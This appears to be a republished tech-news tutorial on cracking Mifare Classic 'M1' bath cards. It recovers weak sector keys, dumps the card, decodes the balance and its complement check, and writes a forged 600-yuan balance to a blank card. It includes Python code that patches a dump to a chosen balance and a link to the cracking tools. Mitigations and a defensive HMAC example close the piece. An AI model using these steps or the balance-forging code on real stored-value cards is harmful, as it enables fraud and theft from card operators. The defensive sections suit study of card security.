Introduction to RFID: cracking Analysis of Mifare1 Intelligent Bath Card

2025-04-10 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

Background:

The Mifare Classic family comes in 1 KB and 4 KB capacities; the one seen most often is the Mifare Classic 1K (S50), commonly called the M1 card. An M1 card has 16 sectors numbered 0 to 15, each sector has its own pair of keys, each sector consists of 4 blocks numbered 0 to 3, and each block holds 16 bytes. All numbering starts at 0, like an array index.

Every M1 card carries a globally unique UID, stored in block 0 of sector 0, also called the manufacturer block. Its first 4 bytes are the UID, the fifth byte is the BCC check byte (the XOR of the four UID bytes), and the remaining bytes hold manufacturer data. The manufacturer block is write-protected at the factory and can only be read, never modified. The exception is the so-called UID card: its block 0 is not locked, so the UID can be rewritten. Such cards do not follow the Mifare specification, and the blank cards sold online are generally of this kind.

Today we take cracking a bath card as the example:

The tools used

Card reader: one ACR122U

Two blank M1 cards

One bath card in normal use


Platform: Windows 7

Software: NFCGUI-PRO.exe

M1 card service program

Cracking idea: the bath card's data (usage time, usage count, balance and so on) lives in the data blocks of one of the 16 sectors of the M1 card. To change that data we first have to export the card's contents. The last block of each sector (block 3, the sector trailer) holds the sector's key pair: 6 bytes of Key A, 4 bytes of access bits and 6 bytes of Key B. A sector's data can only be read after authenticating with one of its keys, so before exporting we have to recover the keys (for the details see how the M1 card works, or http://www.hufubo.com/?p=202). Fortunately, most M1 cards in China still use the default or weak keys (such as FFFFFFFFFFFF). The M1 card service program automates the recovery: it tries a list of well-known default keys and, once one sector opens, uses the known weaknesses of Mifare Classic's Crypto-1 cipher to recover the keys of the remaining sectors (a true exhaustive search of a 48-bit key would not finish in seconds). It then exports the card contents as a dump file (all the cracking tools here write xx.dump). By spending on the card, dumping it again and comparing the sectors at different balances, we work out which bytes hold the balance. Finally the modified dump is written to a blank M1 card with NFCGUI-PRO.exe.

Specific implementation:

Disclaimer: the steps I used may not be the simplest or most efficient way, but as an entry-level popular-science article I only hope that more people understand the process so they can better guard against this method.

1) First check the balance on the card at the bath card terminal:

The balance on the card is 26.91 yuan. Then plug the ACR122U into the machine and use the M1 card service program to crack the card and obtain its dump file.

Crack with the M1 card service program:

Successfully cracked:

Because the M1 card's keys are weak, the crack succeeds in a few seconds and the dump file is generated in the program directory:

Dumpfile 4da2e80e (2015-08-25 23:4).dump is the generated file. Note that the dump is 1 KB (1024 bytes, the complete contents of a 1K card), but when writing to the M1 card the writing tool expects a 4 KB dump.

PS: these tools were originally developed for Linux; the Windows port only produces 1 KB dumps. We can use the repair tool fixdump to pad a 1 KB file to 4 KB, or use NFCGUI-PRO.exe, which has a built-in repair function that produces the 4 KB file. I used NFCGUI-PRO.exe.

Repair, as shown in the figure:

Open the software, click to select a file, choose the 1 KB file just generated, and when prompted "Save to 4K file format?" choose "Yes". The file is then repaired.

Close the software; the 1 KB dump has been converted in place to a 4 KB file.

Repeat the above to obtain three dump files at different balances.
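Step 1 in code, as an added example that is not the article's tooling: parse a 1K dump into sectors and blocks, read the UID and BCC from the manufacturer block, list each sector's Key A / access bits / Key B from its trailer, flag sectors that still use well-known default keys, and zero-pad the 1 KB image to the 4 KB size the writing tool expects. The sample dump and its UID are constructed, not from a real card.

```python
# Added example, not the article's tooling: parse a Mifare Classic 1K dump,
# report which sectors still use well-known default keys, and pad the 1 KB
# image to 4 KB. The sample dump built below is constructed.
import functools

SECTORS = 16
BLOCKS_PER_SECTOR = 4
BLOCK_SIZE = 16
DUMP_1K = SECTORS * BLOCKS_PER_SECTOR * BLOCK_SIZE   # 1024 bytes
DUMP_4K = 4096

# A few widely published factory/default Mifare Classic keys.
DEFAULT_KEYS = {
    bytes.fromhex("FFFFFFFFFFFF"),
    bytes.fromhex("000000000000"),
    bytes.fromhex("A0A1A2A3A4A5"),
    bytes.fromhex("D3F7D3F7D3F7"),
}
TRANSPORT_ACCESS = bytes.fromhex("FF078069")  # factory access bits plus user byte


def block_offset(sector, block):
    """Byte offset of a block inside a 1K dump (absolute blocks run 0..63)."""
    return (sector * BLOCKS_PER_SECTOR + block) * BLOCK_SIZE


def manufacturer_block(dump):
    """(uid, bcc, bcc_ok) from block 0 of sector 0.
    On 4-byte-UID cards the BCC is the XOR of the four UID bytes."""
    b0 = dump[block_offset(0, 0):block_offset(0, 0) + BLOCK_SIZE]
    uid, bcc = b0[0:4], b0[4]
    return uid, bcc, bcc == functools.reduce(lambda a, b: a ^ b, uid)


def sector_trailer(dump, sector):
    """Key A (6 bytes), access bits (4 bytes) and Key B (6 bytes) of a sector."""
    t = dump[block_offset(sector, 3):block_offset(sector, 3) + BLOCK_SIZE]
    return {"key_a": t[0:6], "access": t[6:10], "key_b": t[10:16]}


def weak_sectors(dump):
    """Sectors whose Key A or Key B is in the default-key list."""
    return [s for s in range(SECTORS)
            if sector_trailer(dump, s)["key_a"] in DEFAULT_KEYS
            or sector_trailer(dump, s)["key_b"] in DEFAULT_KEYS]


def pad_to_4k(dump):
    """The Windows tools emit 1024-byte dumps; the writer wants 4096 bytes.
    Zero-pad the tail (those sectors do not exist on a 1K card)."""
    if len(dump) != DUMP_1K:
        raise ValueError("expected a 1K dump, got %d bytes" % len(dump))
    return dump + bytes(DUMP_4K - DUMP_1K)


def make_sample_dump():
    """Constructed 1K image: factory keys everywhere except sector 5."""
    dump = bytearray(DUMP_1K)
    uid = bytes.fromhex("01020304")             # constructed UID
    dump[0:4] = uid
    dump[4] = functools.reduce(lambda a, b: a ^ b, uid)   # BCC
    dump[5] = 0x08                              # SAK of a Classic 1K
    for s in range(SECTORS):
        off = block_offset(s, 3)
        dump[off:off + 6] = bytes.fromhex("FFFFFFFFFFFF")
        dump[off + 6:off + 10] = TRANSPORT_ACCESS
        dump[off + 10:off + 16] = bytes.fromhex("FFFFFFFFFFFF")
    off = block_offset(5, 3)
    dump[off:off + 6] = bytes.fromhex("0123456789AB")        # non-default Key A
    dump[off + 10:off + 16] = bytes.fromhex("BA9876543210")  # non-default Key B
    return bytes(dump)


if __name__ == "__main__":
    d = make_sample_dump()
    uid, bcc, ok = manufacturer_block(d)
    print("UID %s  BCC %02X (%s)" % (uid.hex().upper(), bcc, "ok" if ok else "BAD"))
    for s in range(SECTORS):
        t = sector_trailer(d, s)
        print("sector %2d  keyA %s  access %s  keyB %s" % (
            s, t["key_a"].hex().upper(), t["access"].hex().upper(), t["key_b"].hex().upper()))
    print("sectors with default keys:", weak_sectors(d))
    print("padded size:", len(pad_to_4k(d)))
```

On a real dump from the M1 card service program, `weak_sectors` tells you at a glance whether the operator ever changed the factory keys; a card where every sector is listed is exactly the "cracked in a few seconds" case above.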

2) Compare the dump files in a hex editor to find the balance bytes. I use WinHex to edit the dump files:

Because the two files are dumps of the same card at different balances, we expect the balance bytes to differ, and possibly the swipe counter and the swipe timestamp as well (these are only assumptions; perhaps only the balance is recorded). Comparing the two dumps shows differing bytes at offsets 00000176 and 00000192.

As in the picture

The balance is 26.91:

The balance is 26.88:

The differences between the two dumps are:

Try converting the hex values:

Hex(800A) = 32778

Hex(7FF5) = 32757

Neither is a simple direct conversion of the balance, so swap the two bytes: 800A becomes 0A80.

Hex(0A80) = 2688, which matches the actual balance of 26.88 on the card.

Hex(0A83) = 2691, which matches the actual balance of 26.91 on the card.

So the balance is not encrypted at all: it is stored in hundredths of a yuan as a 16-bit integer with the low byte first (little-endian), which is why "flipping" the two bytes recovers it.

Next, the meaning of 7F F5.

On this card there is a check value next to the balance. Typically, when the balance changes, the check value changes according to some other rule.

The simplest such rule is to store the bitwise complement of the balance (every bit inverted), again with the low byte first.

The calculation is as follows:

Check value 7F F5, swapped to F5 7F; in binary 1111010101111111; invert every bit: 0000101010000000; convert to decimal:

Bin(0000101010000000) = 2688

So the check value is the balance converted to binary, inverted bit by bit, converted back to hexadecimal and stored with the bytes swapped.

For example, balance 26.88 -> 2688 -> 0000101010000000 -> 1111010101111111 -> F57F -> 7F F5

The calculated check value is 7F F5, which matches the card.

Knowing the encoding of both the balance and its check value, we can modify the balance.

To set the balance to 600 yuan:

Balance: 600 -> 60000 -> EA60 -> 60 EA

Check value: 60000 -> 1110101001100000 -> 0001010110011111 -> 159F -> 9F 15

So the balance field should be filled with: 60 EA

and the check field with: 9F 15

(One caveat: the field is 2 bytes, so the largest balance it can hold is 65535, i.e. 655.35 yuan; a larger value would not fit.)

Modify the dump file directly in WinHex:

Save it as 600.dump and the balance is modified.
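Step 2 in code, as an added example that is not the article's tooling: diff two dumps of the same card to find the bytes that moved, decode the balance as a 16-bit little-endian value and verify its one's-complement check, and re-encode a new balance together with its check, refusing values that do not fit in 2 bytes. The field offsets are assumptions (the article does not give the sector), and the dumps are constructed.

```python
# Added example, not the article's tooling: find, decode and re-encode the
# balance field of a Mifare Classic 1K dump. BALANCE_OFFSET / CHECK_OFFSET
# are assumed positions; the dumps are constructed.
import struct

DUMP_1K = 1024
BALANCE_OFFSET = 0x80   # assumed: first bytes of sector 2, block 0
CHECK_OFFSET = 0x82     # assumed: check value immediately after the balance


def diff_dumps(a, b):
    """Offsets at which two dumps of the same card differ (what the hex
    editor comparison does by hand)."""
    if len(a) != len(b):
        raise ValueError("dumps differ in length")
    return [i for i in range(len(a)) if a[i] != b[i]]


def decode_balance(value_bytes, check_bytes):
    """Balance in hundredths of a yuan, stored low byte first, plus whether
    the check bytes are its bitwise complement."""
    value = struct.unpack("<H", value_bytes)[0]
    check = struct.unpack("<H", check_bytes)[0]
    return value, (value ^ 0xFFFF) == check


def encode_balance(cents):
    """(balance bytes, check bytes) for a balance in hundredths of a yuan."""
    if not 0 <= cents <= 0xFFFF:
        raise ValueError("%d does not fit in 16 bits (max 655.35 yuan)" % cents)
    return struct.pack("<H", cents), struct.pack("<H", cents ^ 0xFFFF)


def patch_balance(dump, cents):
    """Return a copy of the dump with the balance and check fields rewritten."""
    value, check = encode_balance(cents)
    out = bytearray(dump)
    out[BALANCE_OFFSET:BALANCE_OFFSET + 2] = value
    out[CHECK_OFFSET:CHECK_OFFSET + 2] = check
    return bytes(out)


def read_balance(dump):
    return decode_balance(dump[BALANCE_OFFSET:BALANCE_OFFSET + 2],
                          dump[CHECK_OFFSET:CHECK_OFFSET + 2])


def make_dump(cents):
    """Constructed card image with only the balance and check fields set."""
    return patch_balance(bytes(DUMP_1K), cents)


if __name__ == "__main__":
    before, after = make_dump(2691), make_dump(2688)      # 26.91 then 26.88
    print("differing offsets:", ["%08X" % i for i in diff_dumps(before, after)])
    for d in (before, after):
        cents, ok = read_balance(d)
        print("balance %.2f yuan, check %s" % (cents / 100, "ok" if ok else "BAD"))
    forged = patch_balance(after, 60000)                   # 600.00 yuan
    print("forged bytes:", forged[BALANCE_OFFSET:CHECK_OFFSET + 2].hex().upper())
    print("forged balance:", read_balance(forged))
```

The check passes for the forged card because the complement can be computed by anyone who can write the sector; it catches bit errors, not tampering. Only the balance bytes changed between the two constructed dumps, so `diff_dumps` returns just the balance and check offsets; a real card will usually also show a moving counter or timestamp, which is why the article dumps the card more than twice.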

3) write the file to a blank card

Write the dump with NFCGUI-PRO.exe:

As shown in the figure:

Open NFCGUI-PRO.exe and, under DUMP and Key files, load 600.dump.

Plug the ACR122U into the computer, place the blank card on the reader and choose write file.

Write successful:


4) Test:

These are the basic steps for cracking an M1 card. This is only a popular-science article; please do not use it for anything illegal!

Mitigations:

1) Replace all cards with CPU cards. A CPU card can emulate the M1 card structure and so replace M1 cards completely, and it is far more secure than the logic-encrypted M1 card.

2) Use a one-card-one-key scheme, where each card's sector keys are derived from a master key and the card's UID. This avoids a hardware upgrade and protects the IC card system as far as the M1 card allows: a key recovered from one card no longer opens every other card, although it does not by itself stop a dumped card from being copied to a blank card with a rewritable UID.

3) Use a rolling code so that each transaction changes the record, which raises the cost of cracking.
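What mitigation 2) looks like in code, together with a replacement for the one's-complement check whose weakness the walkthrough above exploits; this is an added example, not from the article or any card vendor. It assumes a per-card key derived as HMAC-SHA256(master, label || sector || UID) truncated to the 6-byte Mifare key size, and a balance record carrying an 8-byte HMAC tag that binds the balance and a transaction counter to the card's UID. The master key, UIDs and record layout are constructed.

```python
# Added example, not from the article or a vendor: one-card-one-key
# (per-card sector keys derived from a master key and the UID) and a keyed
# integrity tag over the balance record instead of a public complement check.
# MASTER_KEY, the UIDs and the record layout are constructed assumptions.
import hashlib
import hmac
import struct

# Constructed; in a deployment this lives in a SAM/HSM at the terminal, never on disk.
MASTER_KEY = bytes.fromhex("000102030405060708090A0B0C0D0E0F")


def diversified_key(master, uid, sector, which):
    """48-bit Mifare key for (card, sector, b'A' or b'B'):
    HMAC-SHA256 over a labelled input, truncated to 6 bytes."""
    label = b"mfc-key|" + bytes([sector]) + which + uid
    return hmac.new(master, label, hashlib.sha256).digest()[:6]


def balance_record(master, uid, cents, counter):
    """16-byte block: balance(2, LE) | counter(4, LE) | tag(8) | pad(2).
    The tag covers the UID too, so the block is only valid on this card."""
    body = struct.pack("<HI", cents, counter)
    tag = hmac.new(master, b"mfc-bal|" + uid + body, hashlib.sha256).digest()[:8]
    return body + tag + b"\x00\x00"


def verify_record(master, uid, block):
    """(balance, counter) if the tag matches this UID and body, else None."""
    body, tag = block[:6], block[6:14]
    expected = hmac.new(master, b"mfc-bal|" + uid + body, hashlib.sha256).digest()[:8]
    if not hmac.compare_digest(tag, expected):
        return None
    return struct.unpack("<HI", body)


if __name__ == "__main__":
    uid_a, uid_b = bytes.fromhex("01020304"), bytes.fromhex("0A0B0C0D")   # constructed
    for uid in (uid_a, uid_b):
        print("card", uid.hex().upper(), "sector 2 key A:",
              diversified_key(MASTER_KEY, uid, 2, b"A").hex().upper())
    rec = balance_record(MASTER_KEY, uid_a, 2688, 17)
    print("genuine record:", verify_record(MASTER_KEY, uid_a, rec))
    forged = bytearray(rec)
    forged[0:2] = bytes.fromhex("60EA")           # the article's edit to 600.00 yuan
    print("balance edited:", verify_record(MASTER_KEY, uid_a, bytes(forged)))
    print("copied to other card:", verify_record(MASTER_KEY, uid_b, rec))
```

Two caveats a practitioner should keep in mind. First, Crypto-1 is still broken, so diversification only limits the damage of one recovered key; it does not make the sector unreadable. Second, the tag binds the record to a UID, but the blank cards mentioned above let the UID be rewritten, so an exact clone of a dumped card (same UID, same blocks) still verifies. That is what the transaction counter is for: the terminal or backend must remember the last counter seen per UID and reject a record whose counter has gone backwards, which also covers mitigation 3).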

Software tool link: http://pan.baidu.com/s/1sjJuY3V

© 2024 shulou.com SLNews company. All rights reserved.